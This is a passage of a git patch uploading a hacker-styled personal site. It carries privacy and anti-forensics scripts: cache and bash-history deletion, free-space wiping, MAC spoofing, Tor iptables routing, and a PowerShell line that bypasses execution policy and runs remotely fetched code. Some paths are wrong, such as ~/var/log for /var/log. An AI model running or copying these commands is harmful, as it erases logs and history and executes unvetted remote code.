From 4f5ad6a7af15a43e1469e994618e24c623177359 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cristian=20Cezar=20Mois=C3=A9s?= <86272521+cristiancmoises@users.noreply.github.com> Date: Sun, 18 Feb 2024 06:28:49 +0000 Subject: Add files via upload --- css/default.css | 4 +- download/clean.bat | 29 ++++++++++ download/cleanall.sh | 51 ++++++++++++++++ download/clearner.sh | 39 +++++++++++++ download/enp6s0.sh | 39 +++++++++++++ download/eth0.sh | 39 +++++++++++++ download/exherbo.sh | 1 + download/fedora.sh | 1 + download/gorilazadah.ps1 | 8 +++ download/kali.sh | 1 + download/macchanger.sh | 39 +++++++++++++ download/paranoid.sh | 51 ++++++++++++++++ download/torando.sh | 5 ++ download/toroff.sh | 5 ++ download/vncrevolver.zip | Bin 0 -> 15588 bytes download/void.sh | 1 + haunt.scm | 17 +++--- images/anon.gif | Bin 0 -> 2326268 bytes images/brute.png | Bin 0 -> 107427 bytes images/clean.png | Bin 0 -> 35779 bytes images/dark.png | Bin 0 -> 141421 bytes images/dockervm.png | Bin 0 -> 213150 bytes images/faster1.png | Bin 0 -> 57930 bytes images/faster2.png | Bin 0 -> 33269 bytes images/faster3.png | Bin 0 -> 56780 bytes images/faster4.png | Bin 0 -> 33988 bytes images/go.png | Bin 0 -> 221502 bytes images/mainframe_256x256.gif | Bin 0 -> 2691798 bytes images/mask.png | Bin 0 -> 121943 bytes images/open.png | Bin 0 -> 391900 bytes images/open1.png | Bin 0 -> 203185 bytes images/open2.png | Bin 0 -> 94078 bytes images/paranoid.png | Bin 0 -> 129582 bytes images/profile.png | Bin 0 -> 70313 bytes images/revolver.png | Bin 0 -> 312468 bytes images/snow.png | Bin 0 -> 28014 bytes images/st.png | Bin 0 -> 99796 bytes images/steg.gif | Bin 0 -> 325035 bytes images/steghide.png | Bin 0 -> 49540 bytes images/stegoshare.png | Bin 0 -> 12701 bytes images/stegroute.png | Bin 0 -> 72660 bytes images/tor.png | Bin 0 -> 27599 bytes images/torando.png | Bin 0 -> 336708 bytes posts/brute.md | 69 ++++++++++++++++++++++ posts/clean.md | 30 ++++++++++ posts/dockervm.md | 48 ++++++++++++++++ posts/fasteros.md | 49 ++++++++++++++++ posts/gorilazada.md | 40 +++++++++++++ posts/live.md | 19 ++++++ posts/servervm.md | 23 ++++++++ posts/space.md | 50 ++++++++++++++++ posts/spoof.md | 25 ++++++++ posts/stego.md | 118 ++++++++++++++++++++++++++++++++++++++ posts/torando.md | 89 ++++++++++++++++++++++++++++ posts/vnc.md | 93 ++++++++++++++++++++++++++++++ site/-awesome-steganography.html | 46 +++++++++++++++ site/-clean-all.html | 1 + site/-dockervm.html | 2 + site/-openbsd-portfolio.html | 4 ++ site/-servervm.html | 1 + site/-space-invaders.html | 4 ++ site/-spoofmac.html | 2 + site/-torando.html | 13 +++++ site/-vnc-revolver.html | 36 ++++++++++++ site/about.html | 1 + site/css/default.css | 35 +++++++++++ site/download/clean.bat | 29 ++++++++++ site/download/cleanall.sh | 51 ++++++++++++++++ site/download/clearner.sh | 39 +++++++++++++ site/download/enp6s0.sh | 39 +++++++++++++ site/download/eth0.sh | 39 +++++++++++++ site/download/exherbo.sh | 1 + site/download/fedora.sh | 1 + site/download/gorilazadah.ps1 | 8 +++ site/download/kali.sh | 1 + site/download/macchanger.sh | 39 +++++++++++++ site/download/paranoid.sh | 51 ++++++++++++++++ site/download/torando.sh | 5 ++ site/download/toroff.sh | 5 ++ site/download/vncrevolver.zip | Bin 0 -> 15588 bytes site/download/void.sh | 1 + site/fasteros.html | 2 + site/images/anon.gif | Bin 0 -> 2326268 bytes site/images/clean.png | Bin 0 -> 35779 bytes site/images/dark.png | Bin 0 -> 141421 bytes site/images/dockervm.png | Bin 0 -> 213150 bytes site/images/faster1.png | Bin 0 -> 57930 bytes site/images/go.png | Bin 0 -> 221502 bytes site/images/mainframe_256x256.gif | Bin 0 -> 2691798 bytes site/images/paranoid.png | Bin 0 -> 129582 bytes site/images/profile.png | Bin 0 -> 70313 bytes site/images/revolver.png | Bin 0 -> 312468 bytes site/images/st.png | Bin 0 -> 99796 bytes site/images/steg.gif | Bin 0 -> 325035 bytes site/images/steghide.png | Bin 0 -> 49540 bytes site/images/stegroute.png | Bin 0 -> 72660 bytes site/images/torando.png | Bin 0 -> 336708 bytes site/index.html | 1 + site/projects.html | 1 + site/research.html | 1 + 100 files changed, 1432 insertions(+), 10 deletions(-) create mode 100644 download/clean.bat create mode 100644 download/cleanall.sh create mode 100644 download/clearner.sh create mode 100644 download/enp6s0.sh create mode 100644 download/eth0.sh create mode 100644 download/exherbo.sh create mode 100644 download/fedora.sh create mode 100644 download/gorilazadah.ps1 create mode 100644 download/kali.sh create mode 100644 download/macchanger.sh create mode 100644 download/paranoid.sh create mode 100644 download/torando.sh create mode 100644 download/toroff.sh create mode 100644 download/vncrevolver.zip create mode 100644 download/void.sh create mode 100644 images/anon.gif create mode 100644 images/brute.png create mode 100644 images/clean.png create mode 100644 images/dark.png create mode 100644 images/dockervm.png create mode 100644 images/faster1.png create mode 100644 images/faster2.png create mode 100644 images/faster3.png create mode 100644 images/faster4.png create mode 100644 images/go.png create mode 100644 images/mainframe_256x256.gif create mode 100644 images/mask.png create mode 100644 images/open.png create mode 100644 images/open1.png create mode 100644 images/open2.png create mode 100644 images/paranoid.png create mode 100644 images/profile.png create mode 100644 images/revolver.png create mode 100644 images/snow.png create mode 100644 images/st.png create mode 100644 images/steg.gif create mode 100644 images/steghide.png create mode 100644 images/stegoshare.png create mode 100644 images/stegroute.png create mode 100644 images/tor.png create mode 100644 images/torando.png create mode 100644 posts/brute.md create mode 100644 posts/clean.md create mode 100644 posts/dockervm.md create mode 100644 posts/fasteros.md create mode 100644 posts/gorilazada.md create mode 100644 posts/live.md create mode 100644 posts/servervm.md create mode 100644 posts/space.md create mode 100644 posts/spoof.md create mode 100644 posts/stego.md create mode 100644 posts/torando.md create mode 100644 posts/vnc.md create mode 100644 site/-awesome-steganography.html create mode 100644 site/-clean-all.html create mode 100644 site/-dockervm.html create mode 100644 site/-openbsd-portfolio.html create mode 100644 site/-servervm.html create mode 100644 site/-space-invaders.html create mode 100644 site/-spoofmac.html create mode 100644 site/-torando.html create mode 100644 site/-vnc-revolver.html create mode 100644 site/about.html create mode 100644 site/css/default.css create mode 100644 site/download/clean.bat create mode 100644 site/download/cleanall.sh create mode 100644 site/download/clearner.sh create mode 100644 site/download/enp6s0.sh create mode 100644 site/download/eth0.sh create mode 100644 site/download/exherbo.sh create mode 100644 site/download/fedora.sh create mode 100644 site/download/gorilazadah.ps1 create mode 100644 site/download/kali.sh create mode 100644 site/download/macchanger.sh create mode 100644 site/download/paranoid.sh create mode 100644 site/download/torando.sh create mode 100644 site/download/toroff.sh create mode 100644 site/download/vncrevolver.zip create mode 100644 site/download/void.sh create mode 100644 site/fasteros.html create mode 100644 site/images/anon.gif create mode 100644 site/images/clean.png create mode 100644 site/images/dark.png create mode 100644 site/images/dockervm.png create mode 100644 site/images/faster1.png create mode 100644 site/images/go.png create mode 100644 site/images/mainframe_256x256.gif create mode 100644 site/images/paranoid.png create mode 100644 site/images/profile.png create mode 100644 site/images/revolver.png create mode 100644 site/images/st.png create mode 100644 site/images/steg.gif create mode 100644 site/images/steghide.png create mode 100644 site/images/stegroute.png create mode 100644 site/images/torando.png create mode 100644 site/index.html create mode 100644 site/projects.html create mode 100644 site/research.html diff --git a/css/default.css b/css/default.css index e93f70f..35f89d1 100644 --- a/css/default.css +++ b/css/default.css @@ -1,6 +1,6 @@ html, body { - font-size: 18px; - font-family: iosevka; + font-size: 16px; + font-family: hack; background: #000000; color: #00FF66; line-height: 1.25; diff --git a/download/clean.bat b/download/clean.bat new file mode 100644 index 0000000..870fe45 --- /dev/null +++ b/download/clean.bat @@ -0,0 +1,29 @@ +@ECHO OFF + +DEL /S /Q /F "%TEMP%\*.*" + +DEL /S /Q /F "%TMP%\*.*" + +DEL /S /Q /F "%USERPROFILE%\Local Settings\Temp\*.*" + +DEL /S /Q /F "%LOCALAPPDATA%\Temp\*.*" + +DEL /S /Q /F "%WINDIR%\temp\*.*" + +FOR /D %%p IN ("%WINDIR%\Temp\*") DO RMDIR /S /Q "%%p" + +del /f /q "%appdata%\Microsoft\teams\application cache\cache\*.*" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\blob_storage\*.*" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\databases\*.*" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\GPUcache\*.*" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\IndexdDB\*.db" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\Local Storage\*.*" > nul 2>&1 + +del /f /q "%appdata%\Microsoft\teams\tmp\*.*" > nul 2>&1 + +EXIT diff --git a/download/cleanall.sh b/download/cleanall.sh new file mode 100644 index 0000000..d37aae0 --- /dev/null +++ b/download/cleanall.sh @@ -0,0 +1,51 @@ +echo -e " +\033[1;32m + .d8888b. 888 d8888 888 888~~~ + d88P Y88b 888 d88888 888 888~~~~~ + 888 888 888 d88P888 888 888~~~~~~~ + 888 888 .d88b. 8888b. 88888b. d88P 888 888 888~ ~ ~~~~~~ + 888 888 d8P Y8b 88b 888 88b d88P 888 888 888~~~~ ~~~~~~ + 888 888 888 88888888 .d888888 888 888 d88P 888 888 888~~~~~~~~ + Y88b d88P 888 Y8b. 888 888 888 888 d8888888888 888 888~~ ~ ~~ + Y8888P 888 Y8888 Y888888 888 888 d88P 888 888 888~~ + // \\ + ||========================================================================|| + ๐ข๐ฎ๐ฌ๐พ๐ป๐ฎ ๐ญ๐ฎ๐ต๐ฎ๐ฝ๐ฎ ๐๐ธ๐พ๐ป ๐ฝ๐ฎ๐ถ๐น, ๐ฝ๐ป๐ช๐ผ๐ฑ ๐ช๐ท๐ญ ๐ฏ๐ป๐ฎ๐ฎ ๐ญ๐ฒ๐ผ๐ด ๐ผ๐น๐ช๐ฌ๐ฎ || + =========================================================================== + ๐๐๐๐ถ๐๐๐น ๐ต๐ ๐๐๐พ๐๐๐พ๐ถ๐ ๐. ๐๐๐พ๐รฉs + --------------------------------------\033[0m" +day=$(date +%A) +User=$(whoami) +now=$(date +"%T") +echo -e " \e[1;37m ||\e[0m\033[6m Today is : $day\033[0m\e[1;37m|\e[0m\e[1;37m || Time: $now ||\e[0m \033[6m User Is : $User\033[0m\e[1;37m ||\e[0m" +echo "----------------------------------------------------------------------" +echo "|| ๐ข๐ฒ๐๐ฎ ๐ธ๐ฏ ๐๐ฒ๐ต๐ฎ๐ผ ||" +echo "----------------------------------------------------------------------" +du -h --max-depth=1 /tmp/ /var/log/ /var/cache/ ~/.cache/ +echo "----------------------------------------------------------------------" +echo "|| ๐๐ต๐ฎ๐ช๐ท๐ฒ๐ท๐ฐ ||" +echo "----------------------------------------------------------------------" +cd / +rm -rfv ~/var/log/* +rm -rfv ~/var/cache/* +rm -rfv ~/.cache/* +rm -rfv ~/tmp/* +rm -rfv ~/usr/src/tmp/* +rm -rfv ~/.bash_history +rm -rfv /zero.yes /zero.file +echo " " +echo "----------------------------------------------------------------------" +echo "|| ๐๐ต๐ฎ๐ช๐ท๐ฒ๐ท๐ฐ ๐๐ป๐ฎ๐ฎ ๐ค๐น ๐ข๐น๐ช๐ฌ๐ฎ ||" +echo "----------------------------------------------------------------------" +dd if=/dev/zero of=zero.small.file bs=1024 count=102400 +shred -z zero.small.file +cat /dev/zero > zero.file +sync +rm zero.small.file +shred -z zero.file +sync +rm zero.file +echo "----------------------------------------------------------------------" +echo "|| ๏ผณ๏ฝ๏ฝ๏ฝ๏ฝ ๏ฝ ๐๐๐% ๐๐ต๐ฎ๐ช๐ท ||" +echo "---------------------------------------------------------------------" +exit 0 diff --git a/download/clearner.sh b/download/clearner.sh new file mode 100644 index 0000000..8766309 --- /dev/null +++ b/download/clearner.sh @@ -0,0 +1,39 @@ +echo -e " +\033[1;32m + .d8888b. 888 d8888 888 888~~~ + d88P Y88b 888 d88888 888 888~~~~~ + 888 888 888 d88P888 888 888~~~~~~~ + 888 888 .d88b. 8888b. 88888b. d88P 888 888 888~ ~ ~~~~~~ + 888 888 d8P Y8b 88b 888 88b d88P 888 888 888~~~~ ~~~~~~ + 888 888 888 88888888 .d888888 888 888 d88P 888 888 888~~~~~~~~ + Y88b d88P 888 Y8b. 888 888 888 888 d8888888888 888 888~~ ~ ~~ + Y8888P 888 Y8888 Y888888 888 888 d88P 888 888 888~~ + // \\ + ||========================================================================|| + ๐ข๐ฎ๐ฌ๐พ๐ป๐ฎ ๐ญ๐ฎ๐ต๐ฎ๐ฝ๐ฎ ๐๐ธ๐พ๐ป ๐ฝ๐ฎ๐ถ๐น, ๐ฝ๐ป๐ช๐ผ๐ฑ ๐ช๐ท๐ญ ๐ฏ๐ป๐ฎ๐ฎ ๐ญ๐ฒ๐ผ๐ด ๐ผ๐น๐ช๐ฌ๐ฎ || + =========================================================================== + ๐๐๐๐ถ๐๐๐น ๐ต๐ ๐๐๐พ๐๐๐พ๐ถ๐ ๐. ๐๐๐พ๐รฉs + --------------------------------------\033[0m" +day=$(date +%A) +User=$(whoami) +now=$(date +"%T") +echo -e " \e[1;37m ||\e[0m\033[6m Today is : $day\033[0m\e[1;37m|\e[0m\e[1;37m || Time: $now ||\e[0m \033[6m User Is : $User\033[0m\e[1;37m ||\e[0m" +echo "----------------------------------------------------------------------" +echo "|| ๐ข๐ฒ๐๐ฎ ๐ธ๐ฏ ๐๐ฒ๐ต๐ฎ๐ผ ||" +echo "----------------------------------------------------------------------" +du -h --max-depth=1 /tmp/ /var/log/ /var/cache/ ~/.cache/ +echo "----------------------------------------------------------------------" +echo "|| ๐๐ต๐ฎ๐ช๐ท๐ฒ๐ท๐ฐ ||" +echo "----------------------------------------------------------------------" +cd / +rm -rfv ~/var/log/* +rm -rfv ~/var/cache/* +rm -rfv ~/.cache/* +rm -rfv ~/tmp/* +rm -rfv ~/usr/src/tmp/* +rm -rfv ~/.bash_history +echo " " +echo "----------------------------------------------------------------------" +echo "|| ๏ผณ๏ฝ๏ฝ๏ฝ๏ฝ ๏ฝ ๐๐๐% ๐๐ต๐ฎ๐ช๐ท ||" +echo "---------------------------------------------------------------------" +exit 0 diff --git a/download/enp6s0.sh b/download/enp6s0.sh new file mode 100644 index 0000000..8e3e189 --- /dev/null +++ b/download/enp6s0.sh @@ -0,0 +1,39 @@ +#!/bin/bash +echo -e " *\033[1;32m + โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโ โโโโโ โโโ โโโโโโ โโโ โโโโโโโ โโโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ + โโโ โ โโโโ โโโโโโโ โโโโโโโ โโโโโโ โ โโโโโโโ โโโโโโโโโ โโโโ โโ โโโโโโ โโโโ โโโโโโโ โโโโโโ โ โโโโโ โ โโโ โ โโโ โ + โ โโโโ โโโโ โโโโโโโโ โโโโโโโ โโโโโโโโ โ โโโ โโโโโโโ โโโ โโโ โ โโโ โโโ โโโ โโโโโ โโโโโ โโโ โโโโโ โ โโโโ โ โโโโ + โ โโโโโโโโโโ โโโโ โโโโโโ โโโโโโโ โ โโโ โโโ โโโโโโโโโ โโโโ โโโโ โโโโโโโโโ โโโโ โโโโโ โโโโโโโโ โโโ โ โ โโโ โ โโโ + โโโโโโโโโโโโโ โ โโ โโโโโโโโ โโโโโโโโโโโ โโโโ โโโโ โโ โโโโโ โโโโโ โ โโ โโโโโโโโโโโ โโโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ + โ โโโ โ โโโโโ โ โโ โโโโโโ โ โโโโโโ โ โ โ โโ โ โ โโ โโโโโ โโ โ โ โโ โโโโ โโโ โ โโโ โ โ โโ โโโโโโ โโ โโ โโโ โ โโ โโโ โ โ + โ โโ โ โโโ โ โ โ โโ โ โ โโ โ โ โ โ โ โโ โ โ โ โ โโ โ โ โ โ โ โ โ โโ โ โโ โ โ โโ โโ โ โโ โโ โ โ + โ โ โ โโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ + โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ โ โ + โ โ โ + \033[0m*" +echo -e " \e[1;31m *---------------------* \e[0m" +printf " \e[1;31m|\e[0m \033[1;32mWelcome Hacker\033[0m \e[1;31m|\e[0m\n" +printf " \e[1;31m|\e[0m\033[1;32m Keep Safe! \033[0m\e[1;31m|\e[0m\n" +echo -e " \e[1;31m *---------------------*\e[0m" +printf " \e[1;31m/ \ \e[0m \n" +printf " \e[1;31m/ \ \e[0m \n" +day=$(date +%A) +User=$(whoami) +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " \e[1;37m|\e[0m\033[6mToday is : $day\033[0m\e[1;37m|\e[0m\e[1;37m |\e[0m \033[6mUser Is : $User\033[0m\e[1;37m |\e[0m" +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " *_____________________*" +echo -e " |\033[1;32mYour Wifi Mac-Address\033[0m|" +echo "*----------------------*---------------------*" +ifconfig enp6s0 down +macchanger -r enp6s0 +echo "*--------------------------------------------*" +echo " *_________________________*" +echo -e " |\033[1;32mYour Ethernet Mac-Address\033[0m|" +echo "*---------------------*-------------------------*" +macchanger -r enp6s0 +ifconfig enp6s0 up + +echo "*-----------------------------------------------*" +echo -e " *\033[1;32m ๐ ท๐ ฐ๐ ๐ ด ๐ ฐ ๐ ฝ๐ ธ๐ ฒ๐ ด ๐ ณ๐ ฐ๐! \033[0m*" +echo -e " *\033[1;32mType macchanger --show wlan0 OR macchanger --show enp6s0\033[0m*" diff --git a/download/eth0.sh b/download/eth0.sh new file mode 100644 index 0000000..8459b16 --- /dev/null +++ b/download/eth0.sh @@ -0,0 +1,39 @@ +#!/bin/bash +echo -e " *\033[1;32m + โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโ โโโโโ โโโ โโโโโโ โโโ โโโโโโโ โโโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ + โโโ โ โโโโ โโโโโโโ โโโโโโโ โโโโโโ โ โโโโโโโ โโโโโโโโโ โโโโ โโ โโโโโโ โโโโ โโโโโโโ โโโโโโ โ โโโโโ โ โโโ โ โโโ โ + โ โโโโ โโโโ โโโโโโโโ โโโโโโโ โโโโโโโโ โ โโโ โโโโโโโ โโโ โโโ โ โโโ โโโ โโโ โโโโโ โโโโโ โโโ โโโโโ โ โโโโ โ โโโโ + โ โโโโโโโโโโ โโโโ โโโโโโ โโโโโโโ โ โโโ โโโ โโโโโโโโโ โโโโ โโโโ โโโโโโโโโ โโโโ โโโโโ โโโโโโโโ โโโ โ โ โโโ โ โโโ + โโโโโโโโโโโโโ โ โโ โโโโโโโโ โโโโโโโโโโโ โโโโ โโโโ โโ โโโโโ โโโโโ โ โโ โโโโโโโโโโโ โโโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ + โ โโโ โ โโโโโ โ โโ โโโโโโ โ โโโโโโ โ โ โ โโ โ โ โโ โโโโโ โโ โ โ โโ โโโโ โโโ โ โโโ โ โ โโ โโโโโโ โโ โโ โโโ โ โโ โโโ โ โ + โ โโ โ โโโ โ โ โ โโ โ โ โโ โ โ โ โ โ โโ โ โ โ โ โโ โ โ โ โ โ โ โ โโ โ โโ โ โ โโ โโ โ โโ โโ โ โ + โ โ โ โโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ + โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ โ โ + โ โ โ + \033[0m*" +echo -e " \e[1;31m *---------------------* \e[0m" +printf " \e[1;31m|\e[0m \033[1;32mWelcome Hacker\033[0m \e[1;31m|\e[0m\n" +printf " \e[1;31m|\e[0m\033[1;32m Keep Safe! \033[0m\e[1;31m|\e[0m\n" +echo -e " \e[1;31m *---------------------*\e[0m" +printf " \e[1;31m/ \ \e[0m \n" +printf " \e[1;31m/ \ \e[0m \n" +day=$(date +%A) +User=$(whoami) +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " \e[1;37m|\e[0m\033[6mToday is : $day\033[0m\e[1;37m|\e[0m\e[1;37m |\e[0m \033[6mUser Is : $User\033[0m\e[1;37m |\e[0m" +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " *_____________________*" +echo -e " |\033[1;32mYour Wifi Mac-Address\033[0m|" +echo "*----------------------*---------------------*" +ifconfig eth0 down +macchanger -r eth0 +echo "*--------------------------------------------*" +echo " *_________________________*" +echo -e " |\033[1;32mYour Ethernet Mac-Address\033[0m|" +echo "*---------------------*-------------------------*" +macchanger -r eth0 +ifconfig eth0 up + +echo "*-----------------------------------------------*" +echo -e " *\033[1;32m ๐ ท๐ ฐ๐ ๐ ด ๐ ฐ ๐ ฝ๐ ธ๐ ฒ๐ ด ๐ ณ๐ ฐ๐! \033[0m*" +echo -e " *\033[1;32mType macchanger --show wlan0 OR macchanger --show eth0 \033[0m*" diff --git a/download/exherbo.sh b/download/exherbo.sh new file mode 100644 index 0000000..b1690cd --- /dev/null +++ b/download/exherbo.sh @@ -0,0 +1 @@ +docker pull exherbo/exherbo-x86_64-pc-linux-gnu-base diff --git a/download/fedora.sh b/download/fedora.sh new file mode 100644 index 0000000..78d42af --- /dev/null +++ b/download/fedora.sh @@ -0,0 +1 @@ +docker pull fedora diff --git a/download/gorilazadah.ps1 b/download/gorilazadah.ps1 new file mode 100644 index 0000000..99acbf4 --- /dev/null +++ b/download/gorilazadah.ps1 @@ -0,0 +1,8 @@ +Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')) +choco feature enable -n=allowGlobalConfirmation +choco feature enable -n useFipsCompliantChecksums +choco upgrade all +choco install pswindowsupdate +Add-WUServiceManager -ServiceID 7971f918-a847-4430-9279-4a52d1efe18d -Confirm:$false +Install-WindowsUpdate -MicrosoftUpdate -AcceptAll +Get-WuInstall -AcceptAll -IgnoreReboot diff --git a/download/kali.sh b/download/kali.sh new file mode 100644 index 0000000..64efe5c --- /dev/null +++ b/download/kali.sh @@ -0,0 +1 @@ +docker pull kalilinux/kali-bleeding-edge diff --git a/download/macchanger.sh b/download/macchanger.sh new file mode 100644 index 0000000..a06d1a3 --- /dev/null +++ b/download/macchanger.sh @@ -0,0 +1,39 @@ +#!/bin/bash +echo -e " *\033[1;32m + โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโ โโโโโ โโโ โโโโโโ โโโ โโโโโโโ โโโโโโโ โโโโโโ โโโโโโ โโโโโโ โโโโโโ + โโโ โ โโโโ โโโโโโโ โโโโโโโ โโโโโโ โ โโโโโโโ โโโโโโโโโ โโโโ โโ โโโโโโ โโโโ โโโโโโโ โโโโโโ โ โโโโโ โ โโโ โ โโโ โ + โ โโโโ โโโโ โโโโโโโโ โโโโโโโ โโโโโโโโ โ โโโ โโโโโโโ โโโ โโโ โ โโโ โโโ โโโ โโโโโ โโโโโ โโโ โโโโโ โ โโโโ โ โโโโ + โ โโโโโโโโโโ โโโโ โโโโโโ โโโโโโโ โ โโโ โโโ โโโโโโโโโ โโโโ โโโโ โโโโโโโโโ โโโโ โโโโโ โโโโโโโโ โโโ โ โ โโโ โ โโโ + โโโโโโโโโโโโโ โ โโ โโโโโโโโ โโโโโโโโโโโ โโโโ โโโโ โโ โโโโโ โโโโโ โ โโ โโโโโโโโโโโ โโโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ + โ โโโ โ โโโโโ โ โโ โโโโโโ โ โโโโโโ โ โ โ โโ โ โ โโ โโโโโ โโ โ โ โโ โโโโ โโโ โ โโโ โ โ โโ โโโโโโ โโ โโ โโโ โ โโ โโโ โ โ + โ โโ โ โโโ โ โ โ โโ โ โ โโ โ โ โ โ โ โโ โ โ โ โ โโ โ โ โ โ โ โ โ โโ โ โโ โ โ โโ โโ โ โโ โโ โ โ + โ โ โ โโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ + โ โ โ โ โ โ โ โโ โ โ โ โ โ โ โ โ โ โ + โ โ โ + \033[0m*" +echo -e " \e[1;31m *---------------------* \e[0m" +printf " \e[1;31m|\e[0m \033[1;32mWelcome Hacker\033[0m \e[1;31m|\e[0m\n" +printf " \e[1;31m|\e[0m\033[1;32m Keep Safe! \033[0m\e[1;31m|\e[0m\n" +echo -e " \e[1;31m *---------------------*\e[0m" +printf " \e[1;31m/ \ \e[0m \n" +printf " \e[1;31m/ \ \e[0m \n" +day=$(date +%A) +User=$(whoami) +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " \e[1;37m|\e[0m\033[6mToday is : $day\033[0m\e[1;37m|\e[0m\e[1;37m |\e[0m \033[6mUser Is : $User\033[0m\e[1;37m |\e[0m" +echo -e " \e[1;37m ------------------ ----------------\e[0m" +echo -e " *_____________________*" +echo -e " |\033[1;32mYour Wifi Mac-Address\033[0m|" +echo "*----------------------*---------------------*" +ifconfig wlan0 down +macchanger -r wlan0 +echo "*--------------------------------------------*" +echo " *_________________________*" +echo -e " |\033[1;32mYour Ethernet Mac-Address\033[0m|" +echo "*---------------------*-------------------------*" +macchanger -r wlan0 +ifconfig wlan0 up + +echo "*-----------------------------------------------*" +echo -e " *\033[1;32m ๐ ท๐ ฐ๐ ๐ ด ๐ ฐ ๐ ฝ๐ ธ๐ ฒ๐ ด ๐ ณ๐ ฐ๐! \033[0m*" +echo -e " *\033[1;32mType macchanger --show wlan0 OR macchanger --show eth0\033[0m*" diff --git a/download/paranoid.sh b/download/paranoid.sh new file mode 100644 index 0000000..0ea0321 --- /dev/null +++ b/download/paranoid.sh @@ -0,0 +1,51 @@ +echo -e " +\033[1;32m + .d8888b. 888 d8888 888 888~~~ + d88P Y88b 888 d88888 888 888~~~~~ + 888 888 888 d88P888 888 888~~~~~~~ + 888 888 .d88b. 8888b. 88888b. d88P 888 888 888~ ~ ~~~~~~ + 888 888 d8P Y8b 88b 888 88b d88P 888 888 888~~~~ ~~~~~~ + 888 888 888 88888888 .d888888 888 888 d88P 888 888 888~~~~~~~~ + Y88b d88P 888 Y8b. 888 888 888 888 d8888888888 888 888~~ ~ ~~ + Y8888P 888 Y8888 Y888888 888 888 d88P 888 888 888~~ + // \\ + ||========================================================================|| + ๐ข๐ฎ๐ฌ๐พ๐ป๐ฎ ๐ญ๐ฎ๐ต๐ฎ๐ฝ๐ฎ ๐๐ธ๐พ๐ป ๐ฝ๐ฎ๐ถ๐น, ๐ฝ๐ป๐ช๐ผ๐ฑ ๐ช๐ท๐ญ ๐ฏ๐ป๐ฎ๐ฎ ๐ญ๐ฒ๐ผ๐ด ๐ผ๐น๐ช๐ฌ๐ฎ || + =========================================================================== + ๐๐๐๐ถ๐๐๐น ๐ต๐ ๐๐๐พ๐๐๐พ๐ถ๐ ๐. ๐๐๐พ๐รฉs + --------------------------------------\033[0m" +day=$(date +%A) +User=$(whoami) +now=$(date +"%T") +echo -e " \e[1;37m ||\e[0m\033[6m Today is : $day\033[0m\e[1;37m|\e[0m\e[1;37m || Time: $now ||\e[0m \033[6m User Is : $User\033[0m\e[1;37m ||\e[0m" +echo "----------------------------------------------------------------------" +echo "|| ๐ข๐ฒ๐๐ฎ ๐ธ๐ฏ ๐๐ฒ๐ต๐ฎ๐ผ ||" +echo "----------------------------------------------------------------------" +du -h --max-depth=1 /tmp/ /var/log/ /var/cache/ ~/.cache/ +echo "----------------------------------------------------------------------" +echo "|| ๐๐ต๐ฎ๐ช๐ท๐ฒ๐ท๐ฐ ||" +echo "----------------------------------------------------------------------" +cd / +rm -rfv ~/var/log/* +rm -rfv ~/var/cache/* +rm -rfv ~/.cache/* +rm -rfv ~/tmp/* +rm -rfv ~/usr/src/tmp/* +rm -rfv ~/.bash_history +rm -rfv /zero.yes /zero.file +echo " " +echo "----------------------------------------------------------------------" +echo "|| ๐๐ต๐ฎ๐ช๐ท๐ฒ๐ท๐ฐ ๐๐ป๐ฎ๐ฎ ๐ค๐น ๐ข๐น๐ช๐ฌ๐ฎ ||" +echo "----------------------------------------------------------------------" +dd if=/dev/urandom of=zero.small.file bs=1024 count=102400 +shred -z zero.small.file +cat /dev/urandom > zero.file +sync +rm zero.small.file +shred -z zero.file +sync +rm zero.file +echo "----------------------------------------------------------------------" +echo "|| ๏ผณ๏ฝ๏ฝ๏ฝ๏ฝ ๏ฝ ๐๐๐% ๐๐ต๐ฎ๐ช๐ท ||" +echo "---------------------------------------------------------------------" +exit 0 diff --git a/download/torando.sh b/download/torando.sh new file mode 100644 index 0000000..7c74f57 --- /dev/null +++ b/download/torando.sh @@ -0,0 +1,5 @@ + sudo iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner USERAQUI -m tcp -j REDIRECT --to-ports 9040 + sudo iptables -t nat -A OUTPUT -p udp -m owner --uid-owner USERAQUI -m udp --dport 53 -j REDIRECT --to-ports 53 + sudo iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner USERAQUI -m tcp --dport 9040 -j ACCEPT + sudo iptables -t filter -A OUTPUT -p udp -m owner --uid-owner USERAQUI -m udp --dport 53 -j ACCEPT + sudo iptables -t filter -A OUTPUT -m owner --uid-owner USERAQUI -j DROP diff --git a/download/toroff.sh b/download/toroff.sh new file mode 100644 index 0000000..244ca78 --- /dev/null +++ b/download/toroff.sh @@ -0,0 +1,5 